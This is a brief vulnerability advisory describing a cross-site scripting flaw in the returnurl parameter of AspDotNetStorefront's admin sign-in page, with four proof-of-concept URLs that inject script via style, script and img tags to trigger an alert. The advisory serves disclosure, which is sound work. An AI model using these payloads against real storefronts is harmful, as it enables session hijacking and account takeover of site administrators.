|
|
AspDotNetStorefront ReturnURL Parameter Cross-Site Scripting Vulnerability
No exploit is required. The following proof of concept is available: http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=1"style= "background:url(javascript:alert('Vulnerable_To_XSS'))"%20" http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=--><scri pt>alert('Vulnerable_To_XSS')</script> http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=>"><scri pt>alert("Vulnerable_To_XSS")</script> http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=>"'><img %20src="javascript:alert('Vulnerable_To_XSS')"> |
|
Privacy Statement |